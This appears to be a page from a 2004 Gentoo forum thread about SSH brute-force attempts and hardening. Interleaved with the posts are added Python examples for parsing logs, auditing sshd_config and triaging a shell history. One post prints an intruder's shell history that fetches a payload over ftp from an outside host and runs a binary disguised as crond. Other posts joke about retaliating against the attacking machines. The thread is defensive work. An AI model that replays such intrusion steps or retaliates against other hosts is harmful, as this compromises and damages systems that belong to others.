Gentoo Forums
i got hacked. what were they up to?
Gentoo Forums Forum Index - Networking & Security

BlinkEye
Veteran

Joined: 21 Oct 2003
Posts: 1046
Location: Gentoo Forums

PostPosted: Wed Aug 18, 2004 1:16 pm

skyfolly wrote:
would it be more secure without SSH installed?

Damn it, I have to install iptables and chrootkit tonight right away.

of course it is. every piece of software installed (and running of course) increases the potential risk of reducing the security. if you don't use SSH, don't run it. what you do not use or need shouldn't be running.
_________________
Easily backup up your system? klick
Get rid of SSH Brute Force Attempts / Script Kiddies klick
skyfolly
Apprentice

Joined: 16 Jul 2003
Posts: 245
Location: Dongguan & Hong Kong, PRC

PostPosted: Wed Aug 18, 2004 1:47 pm

I am wondering if my server is behind a router, would that router's firewall be enough to protect me from anything? I am using port 8080 as http port as 80 is blocked by ISP.

Hard to compromise my server through a router with limited ports open, right?
_________________
Gone forever.
smart
Guru

Joined: 19 Nov 2002
Posts: 455

PostPosted: Wed Aug 18, 2004 1:52 pm

You don't need to count closed ports anyway, only open ports count and they count equal no matter if there are other ports closed by router or closed due to service nonexistent.
BlinkEye
Veteran

Joined: 21 Oct 2003
Posts: 1046
Location: Gentoo Forums

PostPosted: Wed Aug 18, 2004 2:28 pm

btw, i noticed: over 100 login attempts during the past few days :twisted:
_________________
Easily backup up your system? klick
Get rid of SSH Brute Force Attempts / Script Kiddies klick
kalisphoenix
Apprentice

Joined: 28 Sep 2003
Posts: 211
Location: Ohio

PostPosted: Fri Aug 20, 2004 6:23 am

user: test
pass: test
shell: /bin/analrapewithnailstuddedbroomstick.sh

I'm sure that there's some way to fuck someone up over ssh. I mean, the connection goes both ways, right?

Of course, I suppose this could have indeterminate results depending on whether he sshed into PersonA's box, then from there to PersonB's, and then to mine.

I am paranoid... I've been noticing these for a few days and thought it was someone fuckin' with me. Found this thread through pure chance. Anyone else getting IPs in Germany, France, and elsewhere?
Jeremy_Z
l33t

Joined: 05 Apr 2004
Posts: 671
Location: Shanghai

PostPosted: Fri Aug 20, 2004 7:39 am

Well supposing there is buffer overflow in the ssh client, yes you could do some nasty retaliation :lol:
_________________
"Because two groups of consumers drive the absolute high end of home computing: the gamers and the porn surfers." /.
My gentoo projects, Kelogviewer and a QT4 gui for etc-proposals
kalisphoenix
Apprentice

Joined: 28 Sep 2003
Posts: 211
Location: Ohio

PostPosted: Fri Aug 20, 2004 9:14 am

Quote:
# ssh 131.120.22.14
Broadcast message from root (vc/1) (Sat Aug 21 03:25:02 2004):
Owned.
INIT: Switching to runlevel 6
etc


I think that'd be funny enough and keep the guy checking his computer for rootkits and scouring his hard drive for a couple hours. Too bad I don't know jack about ssh or scripting. I guess now's the time to learn...
dat
Apprentice

Joined: 04 Jun 2004
Posts: 186
Location: Location: Location: Location: Location: Location:

PostPosted: Fri Aug 20, 2004 12:49 pm

jpc82 wrote:
Wow I am glad I saw this post.


I was just looking at my logs and I see this
Code:

Aug 13 20:09:28 [sshd] Illegal user test from 194.78.243.110
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
Aug 13 20:09:29 [sshd] error: Could not get shadow information for NOUSER
Aug 13 20:09:29 [sshd] Failed password for illegal user test from 194.78.243.110 port 3579 ssh2
Aug 13 20:09:31 [sshd] User guest not allowed because shell /dev/null is not executable
Aug 13 20:09:42 [sshd] Failed password for root from 194.78.243.110 port 4229 ssh2



Does this mean that all their attempts were not successful? I have good passwords, and I run glsa-check every week to verify my system.

Also there is the line "Failed password for root". I'm confused since I have ssh set to not allow root access, or is this just the regular error for failed root access?


Also, would moving ssh to another port stop these attacks? I'm assuming it would since they would be trying to connect to the wrong port?


What were you using to generate logs like this??
_________________
HASH BANG SLASH BIN SLASH BASH

in a world without fences, who needs gates?
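The question above (did any of these attempts get in?) is answered by the log itself: only an "Accepted ..." line from sshd records a successful login, and any number of "Failed password" lines means nothing got in. The parser below is an added example, not code from the post; it reads both the "[sshd]" prefix shown here and the "host sshd[pid]:" syslog prefix quoted later in the thread, and the sample log is a constructed copy of the lines above plus one syslog-style line and one constructed successful login so the check has something to report.

```python
import re
from collections import defaultdict

# Constructed sample: the six lines quoted above, one syslog-style line from
# later in the thread, and one constructed "Accepted" line (no such line
# appears in the post) so the success check has something to report.
SAMPLE_LOG = """\
Aug 13 20:09:28 [sshd] Illegal user test from 194.78.243.110
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
Aug 13 20:09:29 [sshd] error: Could not get shadow information for NOUSER
Aug 13 20:09:29 [sshd] Failed password for illegal user test from 194.78.243.110 port 3579 ssh2
Aug 13 20:09:31 [sshd] User guest not allowed because shell /dev/null is not executable
Aug 13 20:09:42 [sshd] Failed password for root from 194.78.243.110 port 4229 ssh2
Aug 20 14:58:07 myhost sshd[25514]: reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
Aug 20 15:01:10 myhost sshd[25520]: Accepted publickey for alice from 10.0.0.5 port 50122 ssh2
"""

# Two prefix layouts appear in this thread, metalog-style "[sshd]" and
# syslog-style "host sshd[pid]:"; the sshd message after them is the same.
PREFIX = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (?:\S+ )?(?:\[sshd\]|sshd\[\d+\]:) (.*)$")

PATTERNS = {
    "illegal_user": re.compile(r"^Illegal user (\S+) from (\S+)"),
    "failed": re.compile(r"^Failed password for (?:illegal user )?(\S+) from (\S+) port (\d+)"),
    "accepted": re.compile(r"^Accepted (\S+) for (\S+) from (\S+) port (\d+)"),
    "reverse_map": re.compile(r"^reverse mapping checking getaddrinfo for (\S+) failed"),
    "bad_shell": re.compile(r"^User (\S+) not allowed because shell (\S+)"),
}

def parse_line(line):
    """One log line -> {ts, kind, fields}, or None if it is not an sshd line."""
    m = PREFIX.match(line.strip())
    if not m:
        return None
    ts, msg = m.groups()
    for kind, pat in PATTERNS.items():
        hit = pat.match(msg)
        if hit:
            return {"ts": ts, "kind": kind, "fields": hit.groups()}
    return {"ts": ts, "kind": "other", "fields": (msg,)}

def summarize(log_text):
    """Per-source-IP tallies, plus the reverse-DNS names that sshd could not
    resolve forward again (the POSSIBLE BREAKIN ATTEMPT lines)."""
    by_ip = defaultdict(lambda: {"failed": 0, "users": set(), "accepted": []})
    rdns_failures = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        f = ev["fields"]
        if ev["kind"] == "illegal_user":
            by_ip[f[1]]["users"].add(f[0])
        elif ev["kind"] == "failed":
            by_ip[f[1]]["failed"] += 1
            by_ip[f[1]]["users"].add(f[0])
        elif ev["kind"] == "accepted":            # fields: method, user, ip, port
            by_ip[f[2]]["accepted"].append((f[1], f[0]))
        elif ev["kind"] == "reverse_map":
            rdns_failures.append(f[0])
    return dict(by_ip), rdns_failures

def successful_logins(by_ip):
    """The post's question: did anything get in?  Only an "Accepted" line
    says yes; any number of "Failed password" lines says no."""
    return [(ip, user, method) for ip, s in by_ip.items()
            for user, method in s["accepted"]]

def brute_force_sources(by_ip, min_failures=2):
    """Addresses worth a whois/abuse report, as suggested later in the thread."""
    return sorted(ip for ip, s in by_ip.items() if s["failed"] >= min_failures)
```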
BlinkEye
Veteran

Joined: 21 Oct 2003
Posts: 1046
Location: Gentoo Forums

PostPosted: Fri Aug 20, 2004 2:11 pm

he wasn't using anything. these are logs from his system because someone tried (and failed) to login.
this line is special though:
Code:
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

which means that he uses some security software.
_________________
Easily backup up your system? klick
Get rid of SSH Brute Force Attempts / Script Kiddies klick
NeddySeagoon
Administrator

Joined: 05 Jul 2003
Posts: 38855
Location: 56N 3W

PostPosted: Fri Aug 20, 2004 3:04 pm

I've got some of these break in attempts.
The ones I have checked out all seem to come from *NIX boxes.

You can do whois <IP address from log> to get to the ISP, then send them the log fragment.
More interesting is telnet <IP address from log> 25 to connect to the smtp mail client on the box(es) that were tapping on your door. The ones I have tried all claim to be running sendmail, which suggests they are not windows boxes.

I've not sent mail that way yet; if the probes are coming from a block of dynamically assigned IP addresses, I could well spam the wrong user.

I've been tempted to open a 'honeypot' account that runs a script on every successful login to do the whois lookup, then email abuse@ISP with the log fragment or even email root@<IP _Addr> so innocent victims get to know their box is compromised.
_________________
Regards,

NeddySeagoon

Computer users fall into two groups:-
those that do backups
those that have never had a hard drive fail.
kaidon
n00b

Joined: 01 Nov 2003
Posts: 72

PostPosted: Fri Aug 20, 2004 3:32 pm

i've also noticed these kind of break in attempts starting around mid-July.

found this thread on fulldisclosure explaining a bit what's going on:
http://archives.neohapsis.com/archives/fulldisclosure/2004-07/thread.html#1008

this worm/script/whatever seems to be finding tons of boxes with same/same accounts out there. amount of hits is rapidly increasing.

first it was solely checking for guest and test accounts. in the meantime it checks for guest, test, user, admin and tries multiple root passwords.
it's really becoming a plague.

cheers
k
den_RDC
Apprentice

Joined: 25 Aug 2002
Posts: 165
Location: beercountry, Belgium;)

PostPosted: Fri Aug 20, 2004 11:13 pm

BlinkEye wrote:
he wasn't using anything. these are logs from his system because someone tried (and failed) to login.
this line is special though:
Code:
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

which means that he uses some security software.

By coincidence, i have the same ip reported in my log files on one of the colocation servers i administer.
Quote:
Aug 20 14:58:07 *hostname* sshd[25514]: reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

Coincidentally, i happen to live in Belgium near the city of Gent ... Maybe i should organize a scriptkiddie manhunt :).
I don't worry about these messages though - as long as you run a sensibly secured setup with decent passwords and/or keys and take all necessary precautions nothing is going to happen. This is probably some scriptkiddie running some l33t scripts he found on the net that check for obvious/old vulns that world+dog-idiots have patched/fixed long ago.
Personally, my worst security nightmare is not having a box rooted (which is bad), but having a damn good hacker on your box and being none the wiser.

edit - i checked another 5 "assorted systems" (colos, my home router, etc) and found that they all have these login attempts. This thing is probably pretty widespread.
_________________
Fan of the "Survivor Warriors of the Evil Empire of Bloody Destruction and Bloody Darkness"
dat
Apprentice

Joined: 04 Jun 2004
Posts: 186
Location: Location: Location: Location: Location: Location:

PostPosted: Sun Aug 22, 2004 11:55 pm

BlinkEye wrote:
he wasn't using anything. these are logs from his system because someone tried (and failed) to login.
this line is special though:
Code:
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

which means that he uses some security software.


Yeah, that was the line that caught my eye too. I figured he was using some different system logger than I use and that was adding those entries in there. Anyone know what added security software he might be using? Or more importantly, a good add-on to use? (Hopefully not too OT)
_________________
HASH BANG SLASH BIN SLASH BASH

in a world without fences, who needs gates?
rtn
Guru

Joined: 15 Nov 2002
Posts: 427

PostPosted: Mon Aug 23, 2004 3:28 am

dat wrote:
BlinkEye wrote:
he wasn't using anything. these are logs from his system because someone tried (and failed) to login.
this line is special though:
Code:
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

which means that he uses some security software.


Yeah, that was the line that caught my eye too. I figured he was using some different system logger than I use and that was adding those entries in there. Anyone know what added security software he might be using? Or more importantly, a good add-on to use? (Hopefully not too OT)


That's actually from OpenSSH. If you look in the file canohost.c in the
openssh sources:

Code:
        if (getaddrinfo(name, NULL, &hints, &aitop) != 0) {
                logit("reverse mapping checking getaddrinfo for %.700s "
                    "failed - POSSIBLE BREAKIN ATTEMPT!", name);
                return xstrdup(ntop);
        }


--rtn
flappy
n00b

Joined: 06 Jun 2004
Posts: 29
Location: Brisbane, Australia

PostPosted: Mon Aug 23, 2004 6:56 am

gdesklets + multitail - displays your log file to your desktop - i know straight away when someone tries to break in... the moment i see this i log into the attacking systems ssh with the username "f*ck" first then again with the username "off"
nielchiano
Veteran

Joined: 11 Nov 2003
Posts: 1283
Location: 50N 3E

PostPosted: Mon Aug 23, 2004 9:19 am

Once again, it is proven that an unprotected computer on the internet (either win or linux) is not safe; unless YOU take some security steps;

This is how my server is secured (So far NO break-in attempts, but there will be, once upon a time): GUIDE:

  • Run SSH on a non-default port (i.e. NOT on TCP/22). Make your pick 1022, 22022, ... you can go up to 65535
    to do this, edit /etc/ssh/sshd_config, look for (or insert) this rule:
    Code:
    Port 1022
    (change 1022 for your port)
    Of course, you'll have to specify on ALL the clients that will connect to use that port (ssh -p 1022 under linux)
  • Add a group called 'ssh' (or whatever) add users that should be able to login to that group (to be done as root)
    Code:
    groupadd ssh

    then edit /etc/group and look for the line starting with 'ssh' (or the name you just chose) to the end, add the list of users:
    Code:
    ssh:x:NNN:user1,user2,...
    (NNN will vary)
  • Allow only key-logins:
    You will need to have your key-file with you all the time (e.g. on a USB stick)

_________________
To an engineer the glass is neither half full, nor half empty - it is just twice as big as it needs to be. (shamelessly stolen from slartibartfasz)
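The three steps of the guide above as an sshd_config audit and rewrite in Python (an added example, not the poster's own script). It also sets PermitRootLogin no, which later posts in the thread recommend; the sample config is constructed, and 1022 and the 'ssh' group are the guide's own placeholder values. One caveat it encodes: sshd uses the first value it reads for a keyword, so a hardened line appended below a weak one is silently ignored.

```python
import re

# Constructed sample: an sshd_config with the stock permissive settings that
# the guide above changes.  Not taken from any poster's system.
WEAK_CONFIG = """\
# /etc/ssh/sshd_config (constructed sample)
Port 22
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes
#PubkeyAuthentication yes
Subsystem sftp /usr/lib/misc/sftp-server
"""

# The guide's three steps, plus PermitRootLogin no from later in the thread.
# 1022 and 'ssh' are the guide's own placeholder values.
WANTED = [
    ("Port", "1022"),                  # anything but 22 passes the audit
    ("AllowGroups", "ssh"),            # only members of the 'ssh' group may log in
    ("PasswordAuthentication", "no"),  # key logins only
    ("PubkeyAuthentication", "yes"),
    ("PermitRootLogin", "no"),
]

DIRECTIVE = re.compile(r"^\s*([A-Za-z]+)\s+(.*?)\s*$")

def effective_settings(config_text):
    """Keyword -> value as sshd will see it: keywords are case-insensitive and
    the FIRST occurrence wins.  Match blocks are out of scope, so parsing
    stops at the first Match line."""
    seen = {}
    for line in config_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = DIRECTIVE.match(line)
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2)
        if key == "match":
            break
        seen.setdefault(key, val)
    return seen

def _ok(key, current, wanted):
    if current is None:
        return False
    return current != "22" if key == "port" else current.lower() == wanted.lower()

def audit(config_text):
    """(keyword, current value or None, wanted value) for each weak or missing directive."""
    eff = effective_settings(config_text)
    return [(name, eff.get(name.lower()), want) for name, want in WANTED
            if not _ok(name.lower(), eff.get(name.lower()), want)]

def harden(config_text):
    """Rewrite the first (effective) occurrence of each flagged directive in
    place and put missing ones at the very top, so nothing earlier shadows them."""
    fix = {name.lower(): (name, want) for name, _, want in audit(config_text)}
    out, done, in_match = [], set(), False
    for line in config_text.splitlines():
        m = DIRECTIVE.match(line)
        key = m.group(1).lower() if m and not line.lstrip().startswith("#") else None
        in_match = in_match or key == "match"
        if key in fix and key not in done and not in_match:
            name, want = fix[key]
            out.append(f"{name} {want}")
            done.add(key)
        else:
            out.append(line)
    missing = [f"{n} {w}" for k, (n, w) in fix.items() if k not in done]
    return "\n".join(missing + out) + "\n"
```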
dyqik
Tux's lil' helper

Joined: 08 May 2003
Posts: 120
Location: Oxford, UK

PostPosted: Mon Aug 23, 2004 9:37 am

Hmm, I have a selection of 6 or 7 attempts to login as test, NOUSER and root in my logs on the 22nd. I have to connect to my work machine (which is connected to the UK academic network, no firewalls allowed beyond what the University provides) from a wide variety of clients, so the only real option for me is to use password SSH on a default port.

On the other hand, I check the logs, and SSH and ICMP are the only open ports, so I think that that is secure enough for now. They didn't seem to want to try and crack the passwords. I'm going to disallow root SSH logins though.
dat
Apprentice

Joined: 04 Jun 2004
Posts: 186
Location: Location: Location: Location: Location: Location:

PostPosted: Mon Aug 23, 2004 10:21 pm

rtn wrote:
dat wrote:
BlinkEye wrote:
he wasn't using anything. these are logs from his system because someone tried (and failed) to login.
this line is special though:
Code:
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

which means that he uses some security software.


Yeah, that was the line that caught my eye too. I figured he was using some different system logger than I use and that was adding those entries in there. Anyone know what added security software he might be using? Or more importantly, a good add-on to use? (Hopefully not too OT)


That's actually from OpenSSH. If you look in the file canohost.c in the
openssh sources:

Code:
        if (getaddrinfo(name, NULL, &hints, &aitop) != 0) {
                logit("reverse mapping checking getaddrinfo for %.700s "
                    "failed - POSSIBLE BREAKIN ATTEMPT!", name);
                return xstrdup(ntop);
        }


--rtn


Weird.. I use openssh and it doesn't log anything like that on failed login attempts.

UPDATE: nm, it's there.. :roll:
_________________
HASH BANG SLASH BIN SLASH BASH

in a world without fences, who needs gates?
froonk
n00b

Joined: 27 Jul 2004
Posts: 44
Location: Hamburg, Germany

PostPosted: Tue Aug 24, 2004 12:20 pm

I found such entries in my log, too. Anyway, I'm not very afraid of those 'attacks' since I pick my passwords very carefully (at least that's what I suppose). Although I'm a bit afraid that someone could bruteforce any of my accounts. Is there a way to increase the time sshd waits after a failed login? I took a quick look at the man page, but found nothing.
nielchiano
Veteran

Joined: 11 Nov 2003
Posts: 1283
Location: 50N 3E

PostPosted: Tue Aug 24, 2004 6:04 pm

froonk wrote:
I found such entries in my log, too. Anyway, I'm not very afraid of those 'attacks' since I pick my passwords very carefully (at least that's what I suppose). Although I'm a bit afraid that someone could bruteforce any of my accounts. Is there a way to increase the time sshd waits after a failed login? I took a quick look at the man page, but found nothing.


can't try it right now (at work), but I think you can do it if you tell SSHd to use PAM and configure that one

A note: If you have him wait for 5 seconds after a failed attempt; make sure that your firewall is also cooperative; else he'll just reconnect for each try; tell your firewall to allow only 1 connection per 5 seconds (from the same IP)
_________________
To an engineer the glass is neither half full, nor half empty - it is just twice as big as it needs to be. (shamelessly stolen from slartibartfasz)
bcore
n00b

Joined: 09 Apr 2003
Posts: 59
Location: Toronto

PostPosted: Thu Aug 26, 2004 12:39 am

Argh.. Just noticed some more stuff at the bottom of .bash_history.. I didn't even notice this before.. I had snipped the bottom part off, cause I saw my own typing, and figured this was a part of it.

Code:

ls
cd 1
ls
rm -rf run
rm -rf run.tar
uname -a
uptime
ftp powerkill.netfirms.com
ls
tar xzvf ranga.tgz
ls
rm -rf ranga.tgz
cd lib
ls
./crond
./crond
./crond
./crond
./crond
./crond
./crond
ls
cd 1/lib/
ls
find | grep sc
sc
ls randfiles/
tail /var/log/messages
[ true ]
exit


I think it's high time for a reformat. God knows what's on this box now.... damn.
_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
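A first pass over a history like the one above, as an added example (not the poster's own analysis): it tags the recon, download, unpack, cleanup and masquerading-daemon steps, and links the archive that was unpacked to the one that was later deleted, which is why the payload is still on disk even though the tarball is gone. The history text is a constructed copy of the lines quoted above; the rule list is an assumption, not an exhaustive signature set.

```python
import re

# Constructed copy of the .bash_history quoted above (added example; the
# rule list below is an assumption, not an exhaustive signature set).
HISTORY = """\
ls
cd 1
ls
rm -rf run
rm -rf run.tar
uname -a
uptime
ftp powerkill.netfirms.com
ls
tar xzvf ranga.tgz
ls
rm -rf ranga.tgz
cd lib
ls
./crond
./crond
./crond
./crond
./crond
./crond
./crond
ls
cd 1/lib/
ls
find | grep sc
sc
ls randfiles/
tail /var/log/messages
[ true ]
exit
"""
# (category, pattern, why it matters when you did not type it yourself)
RULES = [
    ("recon", re.compile(r"^(uname|uptime|id|w|who|cat /etc/issue)\b"), "sizing up the host"),
    ("remote_fetch", re.compile(r"^(ftp|wget|curl|lynx|scp)\s+\S+"), "payload pulled from outside"),
    ("archive_extract", re.compile(r"^tar\s+x\w*\s+(\S+)"), "payload unpacked"),
    ("cleanup", re.compile(r"^rm\s+-rf\s+(\S+)"), "evidence removed"),
    ("daemon_masquerade", re.compile(r"^\./(crond|sshd|init|httpd|kswapd)\b"), "user-dir binary named like a system daemon"),
    ("log_check", re.compile(r"^tail\s+/var/log/\S+"), "checking whether the visit was logged"),
]

def triage(history_text):
    """(line number, category, command, why) for every command a rule matches."""
    findings = []
    for n, cmd in enumerate(history_text.splitlines(), 1):
        cmd = cmd.strip()
        for cat, pat, why in RULES:
            if pat.match(cmd):
                findings.append((n, cat, cmd, why))
                break
    return findings

def summary(findings):
    counts = {}
    for _, cat, _, _ in findings:
        counts[cat] = counts.get(cat, 0) + 1
    return counts

def extracted_then_deleted(findings):
    """Archives that were unpacked and then removed: the contents are still on
    disk under other names even though the tarball itself is gone."""
    extracted = [cmd.split()[-1] for _, cat, cmd, _ in findings if cat == "archive_extract"]
    removed = {cmd.split()[-1] for _, cat, cmd, _ in findings if cat == "cleanup"}
    return [a for a in extracted if a in removed]
```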
Valhlalla
Apprentice

Joined: 22 Sep 2003
Posts: 161
Location: Sydney, Australia.

PostPosted: Thu Aug 26, 2004 2:19 am

My system is set up to email me any failed logins, but since I'm paranoid I'm going to check anyway :P
_________________
Pork Chop Sandwiches, Oh Sh*t!
qzec
Tux's lil' helper

Joined: 19 Jul 2004
Posts: 89

PostPosted: Thu Aug 26, 2004 4:21 am

I think its time for me to check my system. 8O

Q
nok
n00b

Joined: 26 Aug 2004
Posts: 1

PostPosted: Thu Aug 26, 2004 1:58 pm    Post subject: ssh worms, cont.d

There has indeed been a spate of these automated attempts to login to too-obvious accounts of computers running sshd; since July I have had a long list of them for each computer I administer in the weekly logwatch report.

Some previous postings make this sound quite a desperate situation --- e.g., hardware firewall, portknocking, highly restrictive ip ranges allowed to connect, etc. Somewhat following the attitude of the original post, I'd like to say I feel these are over-reactions, i.e. for most people any increase in security would be outweighed by expense or inconvenience.

Turn off unnecessary services.
If having to run services for a local network that are not to be seen from the internet then consider a few simple iptables rules to ensure the services are blocked from the internet regardless of the services' own possible bugs or config file errors.
Update sshd or other servers regularly (e.g. a cron job to emerge sync then check for keywords in the output of emerge -up world ).
Consider forbidding ssh root logins -- a very good idea, since root is one username that no-one needs to guess.
If you really only want to use ssh from a few known addresses, try limiting access by address.
Above all, make sure user accounts have good passwords.

I'd be interested to hear comments on whether there have ever been linux iptables problems that would have made a hardware firewall a better option for preventing unwanted incoming connections.

Also, for those mentioning being "rooted" (without a `u'), do you mean the root password was guessed, or that some exploit was run as another user to become root? What exploit? Was it something in a standard gentoo installation?

Finally, try an automated reporting system such as logwatch -- a clever attacker who gains root would be able to hide the activities, but a wealth of information about system changes and failed or successful logins is obtained in other circumstances!
_________________
Nathaniel Taylor
dannycool
Tux's lil' helper

Joined: 13 Aug 2004
Posts: 111
Location: Karlsruhe Germany

PostPosted: Thu Aug 26, 2004 2:12 pm

nok, rooted just means that the box was entirely compromised and an intruder got root access.



I've been working on a special ssh account on one of my boxes where you get a chrooted bash within a jail that's created on the fly, so after you log out the state of the jail is preserved and any following login would end up with a new jail...

But I'm unsure if I should really open up a ssh account. Even if it can't actually do much (except of course log what has been attempted to do).
Page 3 of 18